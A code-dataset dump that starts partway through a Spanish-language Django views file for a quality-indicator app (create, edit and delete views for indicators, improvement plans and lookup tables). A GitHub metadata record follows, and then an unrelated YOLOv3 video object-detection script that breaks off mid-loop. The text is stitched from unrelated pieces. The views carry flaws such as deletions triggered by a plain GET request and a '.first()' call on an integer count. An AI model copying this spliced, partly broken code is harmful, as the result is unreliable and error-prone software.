return render(request, 'base/TemaWhiteTotal/tema_3.html')
def tema_4(request,*args, **kwargs):
return render(request, 'base/TemaWhiteBlue/tema_4.html')
#fin TEMAS DE LA PAGINA********************
# INICIO VISTAS PARA TIPO DE REPORTE
def Tipo_reporteList(request):
# archi = xlrd.open_workbook('C:\\env\\src\\Calidad\\Apps\\indicador\\funciones\\archivo.xlsx', on_demand=True)
# hoja1 = archi.sheet_by_index(0)
# cont = 0
# for i in range(1,hoja1.nrows):
# fila = hoja1.cell_value(i,0)
# a= Tipo_reporte()
# a.nombre ="prueba"
# a.descripcion = fila
# a.save()
# print(fila)
a= np.random.random()
print('esta es la variable aleatoria', a)
tiporeporte = Tipo_reporte.objects.all()
contexto = {'tiporeportes':tiporeporte}
return render(request, 'indicadores/tiporeporte_list.html', contexto)
def Tipo_reporteCrear(request):
if request.method == 'POST':
form = Tipo_reporteForm(request.POST)
if form.is_valid():
form.save()
return redirect('Tipo_reporte_list')
else:
# controlar las peticiones a solo get y post
form = Tipo_reporteForm()
return render(request, 'indicadores/tiporeporte_form.html', {'form':form})
def Tipo_reporteEdit(request, id_):
tipo_reporte_tem = Tipo_reporte.objects.get(id=id_)
if request.method =='GET':
form = Tipo_reporteForm(instance = tipo_reporte_tem)
else:
form = Tipo_reporteForm(request.POST, instance = tipo_reporte_tem)
if form.is_valid():
form.save()
return redirect('Tipo_reporte_list')
return render(request,'indicadores/tiporeporte_form.html', {'form':form})
def Tipo_reporteElim(request, id_):
tiporeport = Tipo_reporte.objects.get(id = id_)
tiporeport.delete()
return redirect('Tipo_reporte_list')
#FIN VISTAS PARA TIPO DE REPORTE*******************
# INICIO VISTAS PARA Grupo_general
def Grupo_generalList(request):
Grupogeneral = Grupo_general.objects.all()
contexto = {'Grupo_generals':Grupogeneral}
return render(request, 'indicadores/Grupo_general_list.html', contexto)
def Grupo_generalCrear(request):
if request.method == 'POST' :
form = Grupo_generalForm(request.POST)
if form.is_valid():
form.save()
return redirect('Grupo_general_list')
else:
form = Grupo_generalForm()
return render(request, 'indicadores/Grupo_general_form.html', {'form':form})
def Grupo_generalEdit(request, id_):
Grupo_general_tem = Grupo_general.objects.get(id=id_)
if request.method =='GET':
form = Grupo_generalForm(instance = Grupo_general_tem)
else:
form = Grupo_generalForm(request.POST, instance = Grupo_general_tem)
if form.is_valid():
form.save()
return redirect('Grupo_general_list')
return render(request,'indicadores/Grupo_general_form.html', {'form':form})
def Grupo_generalElim(request, id_):
Grupo_general_tem = Grupo_general.objects.get(id = id_)
Grupo_general_tem.delete()
return redirect('Grupo_general_list')
# INICIO VISTAS PARA Sub_grupo
def Sub_grupoList(request):
Sub_grupol = Sub_grupo.objects.all()
contexto = {'Sub_grupos':Sub_grupol}
return render(request, 'indicadores/Sub_grupo_list.html', contexto)
def Sub_grupoCrear(request):
if request.method == 'POST' :
form = Sub_grupoForm(request.POST)
if form.is_valid():
form.save()
return redirect('Sub_grupo_list')
else:
form = Sub_grupoForm()
return render(request, 'indicadores/Sub_grupo_form.html', {'form':form})
def Sub_grupoEdit(request, id_):
Sub_grupo_tem = Sub_grupo.objects.get(id=id_)
if request.method =='GET':
form = Sub_grupoForm(instance = Sub_grupo_tem)
else:
form = Sub_grupoForm(request.POST, instance = Sub_grupo_tem)
if form.is_valid():
form.save()
return redirect('Sub_grupo_list')
return render(request,'indicadores/Sub_grupo_form.html', {'form':form})
def Sub_grupoElim(request, id_):
Sub_grupo_tem = Sub_grupo.objects.get(id = id_)
Sub_grupo_tem.delete()
return redirect('Sub_grupo_list')
# INICIO VISTAS PARA Indicador
def IndicadorList(request):
Indicadorl = Indicador.objects.all()
contexto = {'Indicadors':Indicadorl}
return render(request, 'indicadores/Indicador_list.html', contexto)
def IndicadorCrear(request):
if request.method == 'POST' :
form = IndicadorForm(request.POST)
if form.is_valid():
form.save()
return redirect('Indicador_list')
else:
form = IndicadorForm()
return render(request, 'indicadores/Indicador_form.html', {'form':form})
def IndicadorEdit(request, id_):
Indicador_tem = Indicador.objects.get(id=id_)
if request.method =='GET':
form = IndicadorForm(instance = Indicador_tem)
else:
form = IndicadorForm(request.POST, instance = Indicador_tem)
if form.is_valid():
form.save()
return redirect('Indicador_list')
return render(request,'indicadores/Indicador_form.html', {'form':form})
def IndicadorElim(request, id_):
Indicador_tem = Indicador.objects.get(id = id_)
Indicador_tem.delete()
return redirect('Indicador_list')
# INICIO VISTAS PARA Lenar_Indicador
def Lenar_IndicadorList(request):
# Lenar_Indicadorl = Lenar_Indicador.objects.all()
# if Lenar_Indicadorl.count() != 0:
# for i in Lenar_Indicadorl:
# i.resultado = round(i.valor_numerador/i.valor_denominador,1)
# i.save()
Lenar_Indicadorl = Lenar_Indicador.objects.all()
contexto = {'Lenar_Indicadors':Lenar_Indicadorl}
return render(request, 'indicadores/Lenar_Indicador_list.html', contexto)
def Lenar_IndicadorCrear(request):
Lenar_Indicadorl = Lenar_Indicador.objects.all()
if request.method == 'POST' :
form = Lenar_IndicadorForm(request.POST)
if form.is_valid():
form.save()
print(form)
return redirect('Lenar_Indicador_crear')
else:
form = Lenar_IndicadorForm()
if Lenar_Indicadorl.count() != 0:
Lenar_ind_ultimo = Lenar_Indicadorl.last()
Lenar_ind_ultimo.resultado = round((Lenar_ind_ultimo.valor_numerador/Lenar_ind_ultimo.valor_denominador)*Lenar_ind_ultimo.indicador.factor,2)
Lenar_ind_ultimo.save()
return render(request, 'indicadores/Lenar_Indicador_form.html', {'form':form, 'Lenar_Indicadors':Lenar_Indicadorl})
def Lenar_IndicadorEdit(request, id_):
Lenar_Indicador_tem = Lenar_Indicador.objects.get(id=id_)
if request.method =='GET':
form = Lenar_IndicadorForm(instance = Lenar_Indicador_tem)
else:
form = Lenar_IndicadorForm(request.POST, instance = Lenar_Indicador_tem)
if form.is_valid():
form.save()
Lenar_Indicador_tem = Lenar_Indicador.objects.get(id=id_)
Lenar_Indicador_tem.resultado = round((Lenar_Indicador_tem.valor_numerador/Lenar_Indicador_tem.valor_denominador)*Lenar_Indicador_tem.indicador.factor,2)
Lenar_Indicador_tem.save()
return redirect('Lenar_Indicador_list')
return render(request,'indicadores/Lenar_Indicador_form.html', {'form':form})
#esta es la edicion en la vista del formulario cuando se esta LLenando el Indicador
def Lenar_IndicadorEdit_Form(request, id_):
Lenar_Indicador_tem = Lenar_Indicador.objects.get(id=id_)
if request.method =='GET':
form = Lenar_IndicadorForm(instance = Lenar_Indicador_tem)
else:
form = Lenar_IndicadorForm(request.POST, instance = Lenar_Indicador_tem)
if form.is_valid():
form.save()
Lenar_Indicador_tem = Lenar_Indicador.objects.get(id=id_)
Lenar_Indicador_tem.resultado = round((Lenar_Indicador_tem.valor_numerador/Lenar_Indicador_tem.valor_denominador)*Lenar_Indicador_tem.indicador.factor,2)
Lenar_Indicador_tem.save()
return redirect('Lenar_Indicador_crear')
return render(request,'indicadores/Lenar_Indicador_form_2.html', {'form':form})
#esta vista se realiza porque al momento de editar con los efectos se pierden los valores del numerador y del denominador
def Lenar_IndicadorEdit_Sin_Efecto(request, id_):
Lenar_Indicador_tem = Lenar_Indicador.objects.get(id=id_)
if request.method =='GET':
form = Lenar_IndicadorForm(instance = Lenar_Indicador_tem)
else:
form = Lenar_IndicadorForm(request.POST, instance = Lenar_Indicador_tem)
if form.is_valid():
form.save()
Lenar_Indicador_tem = Lenar_Indicador.objects.get(id=id_)
Lenar_Indicador_tem.resultado = round((Lenar_Indicador_tem.valor_numerador/Lenar_Indicador_tem.valor_denominador)*Lenar_Indicador_tem.indicador.factor,2)
Lenar_Indicador_tem.save()
return redirect('Lenar_Indicador_crear')
return render(request,'indicadores/Lenar_Indicador_form_3.html', {'form':form})
def Lenar_IndicadorElim(request, id_):
Lenar_Indicador_tem = Lenar_Indicador.objects.get(id = id_)
Lenar_Indicador_tem.delete()
return redirect('Lenar_Indicador_list')
# if request.method == 'POST':
# Lenar_Indicador_tem.delete()
# return redirect('Lenar_Indicador_list')
# return render(request,'indicadores/Lenar_Indicador_elim.html', {'Lenar_Indicador_tem':Lenar_Indicador_tem})
#listas para los selects deendientes
def Lista_sub_grupo(request):
grupo_general = request.GET.get('grupo_general')
sub_grupo1 = Sub_grupo.objects.filter(grupo_general=grupo_general).order_by('nombre')
return render(request,'indicadores/listas_dependientes/Lista_sub_grupo.html',{'sub_grupos':sub_grupo1})
def Lista_Indicador(request):
sub_grupo = request.GET.get('sub_grupo')
indicador1 = Indicador.objects.filter(sub_grupo=sub_grupo)
return render(request,'indicadores/listas_dependientes/Lista_Indicador.html',{'indicadors':indicador1})
# Estas son las vistas necesarias para mostrar los campos ocultos dependientes
def Lenar_Indicador_numerador(request):
Lenar_Indicadorl = Lenar_Indicador.objects.all()
if request.method == 'POST' :
form = Lenar_IndicadorForm(request.POST)
if form.is_valid():
form.save()
else:
form = Lenar_IndicadorForm()
indicador = request.GET.get('indicador')
indicador1 = Indicador.objects.filter(id = indicador).last()
return render(request,'indicadores/listas_dependientes/Lenar_Indicador_numerador.html',{'indicadors':indicador1, 'form':form} )
#esta es la vista para cambiar de manera asincronica la unidad del indicdor a la hora de registrarlo
def Lenar_Indicador_unidad(request):
indicador = request.GET.get('indicador')
indicador1 = Indicador.objects.filter(id = indicador).last()
return render(request, 'indicadores/listas_dependientes/Lenar_Indicador_unidad.html',{'unidad':indicador1})
# INICIO VISTAS PARA Plan_Mejoramiento
def Plan_MejoramientoList(request):
Plan_Mejoramientol = Plan_Mejoramiento.objects.all()
contexto = {'Plan_Mejoramientos':Plan_Mejoramientol}
return render(request, 'indicadores/Plan_Mejoramiento_list.html', contexto)
def Plan_MejoramientoCrear(request, id_):
llave_prim = Lenar_Indicador.objects.get(id =id_)
contar_planes_mejo = Plan_Mejoramiento.objects.filter(lenar_Indicador=id_)
if contar_planes_mejo.count() == 0:
instancia = Plan_Mejoramiento()
instancia.lenar_Indicador = llave_prim
else:
instancia = contar_planes_mejo.first()
if request.method == 'POST' :
form = Plan_MejoramientoForm(request.POST)
if form.is_valid():
form.save()
return redirect('Plan_Mejoramiento_list')
else:
form = Plan_MejoramientoForm(instance = instancia)
return render(request, 'indicadores/Plan_Mejoramiento_form.html', {'form':form})
def Plan_MejoramientoEdit(request, id_):
Plan_Mejoramiento_tem = Plan_Mejoramiento.objects.get(id=id_)
if request.method =='GET':
form = Plan_MejoramientoForm(instance = Plan_Mejoramiento_tem)
else:
form = Plan_MejoramientoForm(request.POST, instance = Plan_Mejoramiento_tem)
if form.is_valid():
form.save()
return redirect('Plan_Mejoramiento_list')
return render(request,'indicadores/Plan_Mejoramiento_form.html', {'form':form})
def Plan_MejoramientoElim(request, id_):
Plan_Mejoramiento_tem = Plan_Mejoramiento.objects.get(id = id_)
Plan_Mejoramiento_tem.delete()
return redirect('Plan_Mejoramiento_list')
# INICIO VISTAS PARA Seguimiento de la Eficacia
# Estado_Avance
def Estado_AvanceList(request):
Estado_Avance1 = Estado_Avance.objects.all()
contexto = {'Estado_Avances':Estado_Avance1}
return render(request, 'indicadores/Estado_Avance_list.html', contexto)
def Estado_AvanceCrear(request):
if request.method == 'POST' :
form = Estado_AvanceForm(request.POST)
if form.is_valid():
form.save()
return redirect('Estado_Avance_list')
else:
form = Estado_AvanceForm()
return render(request, 'indicadores/Estado_Avance_form.html', {'form':form})
def Estado_AvanceEdit(request, id_):
Estado_Avance_tem = Estado_Avance.objects.get(id=id_)
if request.method =='GET':
form = Estado_AvanceForm(instance = Estado_Avance_tem)
else:
form = Estado_AvanceForm(request.POST, instance = Estado_Avance_tem)
if form.is_valid():
form.save()
return redirect('Estado_Avance_list')
return render(request,'indicadores/Estado_Avance_form.html', {'form':form})
def Estado_AvanceElim(request, id_):
Estado_Avance_tem = Estado_Avance.objects.get(id = id_)
Estado_Avance_tem.delete()
return redirect('Estado_Avance_list')
def Lista_Plan_Mejoramiento(request):
plan_Mejoramiento = request.GET.get('plan_Mejoramiento')
plan = Plan_Mejoramiento.objects.get(id=plan_Mejoramiento)
print("este es el plan" , plan.titulo)
return render(request,'indicadores/listas_dependientes/Form_Plan_Mejoramiento.html',{'plan_mejora':plan} )
# Estado_Accion
def Estado_AccionList(request):
Estado_Accion1 = Estado_Accion.objects.all()
contexto = {'Estado_Accions':Estado_Accion1}
return render(request, 'indicadores/Estado_Accion_list.html', contexto)
def Estado_AccionCrear(request):
if request.method == 'POST' :
form = Estado_AccionForm(request.POST)
if form.is_valid():
form.save()
return redirect('Estado_Accion_list')
else:
form = Estado_AccionForm()
return render(request, 'indicadores/Estado_Accion_form.html', {'form':form})
def Estado_AccionEdit(request, id_):
Estado_Accion_tem = Estado_Accion.objects.get(id=id_)
if request.method =='GET':
form = Estado_AccionForm(instance = Estado_Accion_tem)
else:
form = Estado_AccionForm(request.POST, instance = Estado_Accion_tem)
if form.is_valid():
form.save()
return redirect('Estado_Accion_list')
return render(request,'indicadores/Estado_Accion_form.html', {'form':form})
def Estado_AccionElim(request, id_):
Estado_Accion_tem = Estado_Accion.objects.get(id = id_)
Estado_Accion_tem.delete()
return redirect('Estado_Accion_list')
# Oportunidad_Ejecucion
def Oportunidad_EjecucionList(request):
Oportunidad_Ejecucion1 = Oportunidad_Ejecucion.objects.all()
contexto = {'Oportunidad_Ejecucions':Oportunidad_Ejecucion1}
return render(request, 'indicadores/Oportunidad_Ejecucion_list.html', contexto)
def Oportunidad_EjecucionCrear(request):
if request.method == 'POST' :
form = Oportunidad_EjecucionForm(request.POST)
if form.is_valid():
form.save()
return redirect('Oportunidad_Ejecucion_list')
else:
form = Oportunidad_EjecucionForm()
return render(request, 'indicadores/Oportunidad_Ejecucion_form.html', {'form':form})
def Oportunidad_EjecucionEdit(request, id_):
Oportunidad_Ejecucion_tem = Oportunidad_Ejecucion.objects.get(id=id_)
if request.method =='GET':
form = Oportunidad_EjecucionForm(instance = Oportunidad_Ejecucion_tem)
else:
form = Oportunidad_EjecucionForm(request.POST, instance = Oportunidad_Ejecucion_tem)
if form.is_valid():
form.save()
return redirect('Oportunidad_Ejecucion_list')
return render(request,'indicadores/Oportunidad_Ejecucion_form.html', {'form':form})
def Oportunidad_EjecucionElim(request, id_):
Oportunidad_Ejecucion_tem = Oportunidad_Ejecucion.objects.get(id = id_)
Oportunidad_Ejecucion_tem.delete()
return redirect('Oportunidad_Ejecucion_list')
# Porcentaje_Avance
def Porcentaje_AvanceList(request):
Porcentaje_Avance1 = Porcentaje_Avance.objects.all()
contexto = {'Porcentaje_Avances':Porcentaje_Avance1}
return render(request, 'indicadores/Porcentaje_Avance_list.html', contexto)
def Porcentaje_AvanceCrear(request):
if request.method == 'POST' :
form = Porcentaje_AvanceForm(request.POST)
if form.is_valid():
form.save()
return redirect('Porcentaje_Avance_list')
else:
form = Porcentaje_AvanceForm()
return render(request, 'indicadores/Porcentaje_Avance_form.html', {'form':form})
def Porcentaje_AvanceEdit(request, id_):
Porcentaje_Avance_tem = Porcentaje_Avance.objects.get(id=id_)
if request.method =='GET':
form = Porcentaje_AvanceForm(instance = Porcentaje_Avance_tem)
else:
form = Porcentaje_AvanceForm(request.POST, instance = Porcentaje_Avance_tem)
if form.is_valid():
form.save()
return redirect('Porcentaje_Avance_list')
return render(request,'indicadores/Porcentaje_Avance_form.html', {'form':form})
def Porcentaje_AvanceElim(request, id_):
Porcentaje_Avance_tem = Porcentaje_Avance.objects.get(id = id_)
Porcentaje_Avance_tem.delete()
return redirect('Porcentaje_Avance_list')
# Estado_Hallazgo
def Estado_HallazgoList(request):
Estado_Hallazgo1 = Estado_Hallazgo.objects.all()
contexto = {'Estado_Hallazgos':Estado_Hallazgo1}
return render(request, 'indicadores/Estado_Hallazgo_list.html', contexto)
def Estado_HallazgoCrear(request):
if request.method == 'POST' :
form = Estado_HallazgoForm(request.POST)
if form.is_valid():
form.save()
return redirect('Estado_Hallazgo_list')
else:
form = Estado_HallazgoForm()
return render(request, 'indicadores/Estado_Hallazgo_form.html', {'form':form})
def Estado_HallazgoEdit(request, id_):
Estado_Hallazgo_tem = Estado_Hallazgo.objects.get(id=id_)
if request.method =='GET':
form = Estado_HallazgoForm(instance = Estado_Hallazgo_tem)
else:
form = Estado_HallazgoForm(request.POST, instance = Estado_Hallazgo_tem)
if form.is_valid():
form.save()
return redirect('Estado_Hallazgo_list')
return render(request,'indicadores/Estado_Hallazgo_form.html', {'form':form})
def Estado_HallazgoElim(request, id_):
Estado_Hallazgo_tem = Estado_Hallazgo.objects.get(id = id_)
Estado_Hallazgo_tem.delete()
return redirect('Estado_Hallazgo_list')
# Seguimiento_Eficacia
def Seguimiento_EficaciaList(request):
Seguimiento_Eficacia1 = Seguimiento_Eficacia.objects.all()
contexto = {'Seguimiento_Eficacias':Seguimiento_Eficacia1}
return render(request, 'indicadores/Seguimiento_Eficacia_list.html', contexto)
def Seguimiento_EficaciaCrear(request):
if request.method == 'POST' :
form = Seguimiento_EficaciaForm(request.POST)
if form.is_valid():
form.save()
return redirect('Seguimiento_Eficacia_list')
else:
form = Seguimiento_EficaciaForm()
return render(request, 'indicadores/Seguimiento_Eficacia_form.html', {'form':form})
def Seguimiento_EficaciaCrearDos(request, id_):
llave_prim = Plan_Mejoramiento.objects.get(id =id_)
contar_seguimiento_efica = Seguimiento_Eficacia.objects.filter(plan_Mejoramiento=id_).count()
if contar_seguimiento_efica == 0:
instancia = Seguimiento_Eficacia()
instancia.plan_Mejoramiento = llave_prim
else:
instancia = contar_seguimiento_efica.first()
if request.method == 'POST' :
form = Seguimiento_EficaciaForm(request.POST)
if form.is_valid():
form.save()
return redirect('Seguimiento_Eficacia_list')
else:
form = Seguimiento_EficaciaForm(instance = instancia)
return render(request, 'indicadores/Seguimiento_Eficacia_form.html', {'form':form})
def Seguimiento_EficaciaEdit(request, id_):
Seguimiento_Eficacia_tem = Seguimiento_Eficacia.objects.get(id=id_)
if request.method =='GET':
form = Seguimiento_EficaciaForm(instance = Seguimiento_Eficacia_tem)
else:
form = Seguimiento_EficaciaForm(request.POST, instance = Seguimiento_Eficacia_tem)
if form.is_valid():
form.save()
return redirect('Seguimiento_Eficacia_list')
return render(request,'indicadores/Seguimiento_Eficacia_form.html', {'form':form})
def Seguimiento_EficaciaElim(request, id_):
Seguimiento_Eficacia_tem = Seguimiento_Eficacia.objects.get(id = id_)
Seguimiento_Eficacia_tem.delete()
return redirect('Seguimiento_Eficacia_list')
#listas para los selects deendientes
def Lista_Estado_Accion(request):
estado_Avance = request.GET.get('estado_Avance')
estado_Accion1 = Estado_Accion.objects.filter(estado_Avance=estado_Avance)
return render(request,'indicadores/listas_dependientes/Lista_Estado_Accion.html',{'estado_Accions':estado_Accion1})
def Lista_Estado_Hallazgo(request):
estado_Avance = request.GET.get('estado_Avance')
estado_Hallazgo1 = Estado_Hallazgo.objects.filter(estado_Avance=estado_Avance)
return render(request,'indicadores/listas_dependientes/Lista_Estado_Hallazgo.html',{'estado_Hallazgos':estado_Hallazgo1})
def Lista_Porcentaje_Avance(request):
estado_Avance = request.GET.get('estado_Avance')
porcentaje_Avance1 = Porcentaje_Avance.objects.filter(estado_Avance=estado_Avance)
return render(request,'indicadores/listas_dependientes/Lista_Porcentaje_Avance.html',{'porcentaje_Avances':porcentaje_Avance1})
# Parametro_Segui_Eficacia
def Parametro_Segui_EficaciaList(request):
Parametro_Segui_Eficacia1 = Parametro_Segui_Eficacia.objects.all()
contexto = {'Parametro_Segui_Eficacias':Parametro_Segui_Eficacia1}
return render(request, 'indicadores/Parametro_Segui_Eficacia_list.html', contexto)
def Parametro_Segui_EficaciaCrear(request):
if request.method == 'POST' :
form = Parametro_Segui_EficaciaForm(request.POST)
if form.is_valid():
form.save()
return redirect('Parametro_Segui_Eficacia_list')
else:
form = Parametro_Segui_EficaciaForm()
return render(request, 'indicadores/Parametro_Segui_Eficacia_form.html', {'form':form})
def Parametro_Segui_EficaciaEdit(request, id_):
Parametro_Segui_Eficacia_tem = Parametro_Segui_Eficacia.objects.get(id=id_)
if request.method =='GET':
form = Parametro_Segui_EficaciaForm(instance = Parametro_Segui_Eficacia_tem)
else:
form = Parametro_Segui_EficaciaForm(request.POST, instance = Parametro_Segui_Eficacia_tem)
if form.is_valid():
form.save()
return redirect('Parametro_Segui_Eficacia_list')
return render(request,'indicadores/Parametro_Segui_Eficacia_form.html', {'form':form})
def Parametro_Segui_EficaciaElim(request, id_):
Parametro_Segui_Eficacia_tem = Parametro_Segui_Eficacia.objects.get(id = id_)
Parametro_Segui_Eficacia_tem.delete()
return redirect('Parametro_Segui_Eficacia_list')
# Unidad_Medida
def Unidad_MedidaList(request):
Unidad_Medida1 = Unidad_Medida.objects.all()
contexto = {'Unidad_Medidas':Unidad_Medida1}
return render(request, 'indicadores/Unidad_Medida_list.html', contexto)
def Unidad_MedidaCrear(request):
if request.method == 'POST':
form = Unidad_MedidaForm(request.POST)
if form.is_valid():
form.save()
return redirect('Unidad_Medida_list')
else:
form = Unidad_MedidaForm()
return render(request, 'indicadores/Unidad_Medida_form.html', {'form':form})
def Unidad_MedidaEdit(request, id_):
Unidad_Medida_tem = Unidad_Medida.objects.get(id=id_)
if request.method =='GET':
form = Unidad_MedidaForm(instance = Unidad_Medida_tem)
else:
form = Unidad_MedidaForm(request.POST, instance = Unidad_Medida_tem)
if form.is_valid():
form.save()
return redirect('Unidad_Medida_list')
return render(request,'indicadores/Unidad_Medida_form.html', {'form':form})
def Unidad_MedidaElim(request, id_):
Unidad_Medida_tem = Unidad_Medida.objects.get(id = id_)
Unidad_Medida_tem.delete()
return redirect('Unidad_Medida_list')
# Cargo
def CargoList(request):
Cargo1 = Cargo.objects.all()
contexto = {'Cargos':Cargo1}
return render(request, 'indicadores/Cargo_list.html', contexto)
def CargoCrear(request):
if request.method == 'POST':
form = CargoForm(request.POST)
if form.is_valid():
form.save()
return redirect('Cargo_list')
else:
form = CargoForm()
return render(request, 'indicadores/Cargo_form.html', {'form':form})
def CargoEdit(request, id_):
Cargo_tem = Cargo.objects.get(id=id_)
if request.method =='GET':
form = CargoForm(instance = Cargo_tem)
else:
form = CargoForm(request.POST, instance = Cargo_tem)
if form.is_valid():
form.save()
return redirect('Cargo_list')
return render(request,'indicadores/Cargo_form.html', {'form':form})
def CargoElim(request, id_):
Cargo_tem = Cargo.objects.get(id = id_)
Cargo_tem.delete()
return redirect('Cargo_list')
# Norma
def NormaList(request):
Norma1 = Norma.objects.all()
contexto = {'Normas':Norma1}
return render(request, 'indicadores/Norma_list.html', contexto)
def NormaCrear(request):
if request.method == 'POST':
form = NormaForm(request.POST)
if form.is_valid():
form.save()
return redirect('Norma_list')
else:
form = NormaForm()
return render(request, 'indicadores/Norma_form.html', {'form':form})
def NormaEdit(request, id_):
Norma_tem = Norma.objects.get(id=id_)
if request.method =='GET':
form = NormaForm(instance = Norma_tem)
else:
form = NormaForm(request.POST, instance = Norma_tem)
if form.is_valid():
form.save()
return redirect('Norma_list')
return render(request,'indicadores/Norma_form.html', {'form':form})
def NormaElim(request, id_):
Norma_tem = Norma.objects.get(id = id_)
Norma_tem.delete()
return redirect('Norma_list')
# Nivel_Referencia
def Nivel_ReferenciaList(request):
Nivel_Referencia1 = Nivel_Referencia.objects.all()
contexto = {'Nivel_Referencias':Nivel_Referencia1}
return render(request, 'indicadores/Nivel_Referencia_list.html', contexto)
def Nivel_ReferenciaCrear(request):
if request.method == 'POST':
form = Nivel_ReferenciaForm(request.POST)
if form.is_valid():
form.save()
return redirect('Nivel_Referencia_list')
else:
form = Nivel_ReferenciaForm()
return render(request, 'indicadores/Nivel_Referencia_form.html', {'form':form})
def Nivel_ReferenciaEdit(request, id_):
Nivel_Referencia_tem = Nivel_Referencia.objects.get(id=id_)
if request.method =='GET':
form = Nivel_ReferenciaForm(instance = Nivel_Referencia_tem)
else:
form = Nivel_ReferenciaForm(request.POST, instance = Nivel_Referencia_tem)
if form.is_valid():
form.save()
return redirect('Nivel_Referencia_list')
return render(request,'indicadores/Nivel_Referencia_form.html', {'form':form})
def Nivel_ReferenciaElim(request, id_):
Nivel_Referencia_tem = Nivel_Referencia.objects.get(id = id_)
Nivel_Referencia_tem.delete()
return redirect('Nivel_Referencia_list')
# Proceso
def ProcesoList(request):
Proceso1 = Proceso.objects.all()
contexto = {'Procesos':Proceso1}
return render(request, 'indicadores/Proceso_list.html', contexto)
def ProcesoCrear(request):
if request.method == 'POST':
form = ProcesoForm(request.POST)
if form.is_valid():
form.save()
return redirect('Proceso_list')
else:
form = ProcesoForm()
return render(request, 'indicadores/Proceso_form.html', {'form':form})
def ProcesoEdit(request, id_):
Proceso_tem = Proceso.objects.get(id=id_)
if request.method =='GET':
form = ProcesoForm(instance = Proceso_tem)
else:
form = ProcesoForm(request.POST, instance = Proceso_tem)
if form.is_valid():
form.save()
return redirect('Proceso_list')
return render(request,'indicadores/Proceso_form.html', {'form':form})
def ProcesoElim(request, id_):
Proceso_tem = Proceso.objects.get(id = id_)
Proceso_tem.delete()
return redirect('Proceso_list')
# Tipo_Proc
def Tipo_ProcList(request):
Tipo_Proc1 = Tipo_Proc.objects.all()
contexto = {'Tipo_Procs':Tipo_Proc1}
return render(request, 'indicadores/Tipo_Proc_list.html', contexto)
def Tipo_ProcCrear(request):
if request.method == 'POST' :
form = Tipo_ProcForm(request.POST)
if form.is_valid():
form.save()
return redirect('Tipo_Proc_list')
else:
form = Tipo_ProcForm()
return render(request, 'indicadores/Tipo_Proc_form.html', {'form':form})
def Tipo_ProcEdit(request, id_):
Tipo_Proc_tem = Tipo_Proc.objects.get(id=id_)
if request.method =='GET':
form = Tipo_ProcForm(instance = Tipo_Proc_tem)
else:
form = Tipo_ProcForm(request.POST, instance = Tipo_Proc_tem)
if form.is_valid():
form.save()
return redirect('Tipo_Proc_list')
return render(request,'indicadores/Tipo_Proc_form.html', {'form':form})
def Tipo_ProcElim(request, id_):
Tipo_Proc_tem = Tipo_Proc.objects.get(id = id_)
Tipo_Proc_tem.delete()
return redirect('Tipo_Proc_list')
| WETECH-INNOVATIONS/wetech | Calidad/Apps/indicador/views.py | views.py | py | 35,474 | python | es | code | 0 | github-code | 1 | [
{
"api_name": "django.views.generic.CreateView",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "django.urls.reverse_lazy",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 40,
"usage_type": "call"
},
... |
74496272353 | # ==================================
# Video Object Detection with YOLOv3
# ==================================
# RUN WITH EXAMPLE COMMAND BELOW:
# python YOLO_vid.py -i vid_IO/drive.mp4 -o vid_IO/drive_processed.mp4 -y yolov3
import numpy as np
import argparse
import imutils
import time
import cv2
import os
"""User inputs through command line"""
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input", required=True, help="path to input video")
ap.add_argument("-o", "--output", required=True, help="path to output video")
ap.add_argument("-y", "--yolo", required=True, help="base path to YOLO directory")
ap.add_argument("-c", "--confidence", type=float, default=0.5, help="minimum probability to filter weak detections")
ap.add_argument("-t", "--threshold", type=float, default=0.3, help="threshold when applying non-maxima suppression")
args = vars(ap.parse_args())
def get_model():
"""Load YOLOv3 using cv2 built in DNN module."""
model = cv2.dnn.readNetFromDarknet(os.path.sep.join([args["yolo"], "yolov3.cfg"]),
os.path.sep.join([args["yolo"], "yolov3.weights"]))
# load COCO class labels (open coco.names file (concatenated) -> extract string -> removed lead and end
# whitespace, split by \n)
labels = open(os.path.sep.join([args["yolo"], "coco.names"])).read().strip().split("\n")
# get output layer names (getLayerNames not subscriptable)
getLayer = model.getLayerNames()
out_layer_names = [getLayer[i[0] - 1] for i in model.getUnconnectedOutLayers()]
# print("YOLOv3 output layer names:", *out_layer_names, sep=" ")
return labels, model, out_layer_names
def get_color(labels):
"""Initialize random colors."""
np.random.seed(1)
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
return colors
def init_video():
"""Initialize video stream."""
video_stream = cv2.VideoCapture(args["input"])
writer = None # videoWriter object
(frame_width, frame_height) = (None, None)
return video_stream, writer, frame_width, frame_height
def get_frame_number(video_stream):
"""Try to get total frame number for estimating process time."""
try:
prop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() else cv2.CAP_PROP_FRAME_COUNT
num_frame = int(video_stream.get(prop))
print("{} total frames in video".format(num_frame))
except:
print("Cannot determine the approximate processing time needed.")
num_frame = -1
return num_frame
# -----------------------------------------------------------
# Below functions are all called in the video stream pipeline
# -----------------------------------------------------------
def preprocess_input(model, frame):
"""Augment input and set up for forward pass."""
blob = cv2.dnn.blobFromImage(frame, 1.0 / 255, (416, 416), swapRB=True, crop=False)
model.setInput(blob)
def get_input(video_stream, frame_width, frame_height):
"""Grab frames and return dimensions."""
(grabbed, frame) = video_stream.read()
# end of video, break out of loop
if not grabbed:
return None, None, None, grabbed
if frame_width is None or frame_height is None:
(frame_height, frame_width) = frame.shape[:2]
return frame, frame_height, frame_width, grabbed
def forward_pass(writer, model, out_layer_names, num_frame):
"""Forward pass, non-max suppression done by default. Estimate process time."""
tick = time.time()
layer_outputs = model.forward(out_layer_names)
tock = time.time()
# writer is uninitialized for the first frame only
if writer == None and num_frame > 0:
print("YOLOv3 took {:.3f} seconds for one frame".format(tock - tick))
print("YOLOv3 takes estimated total time of {:.3f} seconds for the video".format((tock - tick) * num_frame))
return layer_outputs
def filter_output(layer_outputs, frame_width, frame_height):
"""Get lists for bounding box."""
boxes = []
confidences = []
classIDs = []
# process output
for output in layer_outputs:
for detection in output:
scores = detection[5:] # detection starts with locational variables (0 to 1)
classID = np.argmax(scores)
confidence = scores[classID]
if confidence > args["confidence"]: # filter out low confidence
box_data = detection[:4] * np.array([frame_width, frame_height, frame_width, frame_height])
(center_X, center_Y, box_width, box_height) = box_data.astype("int")
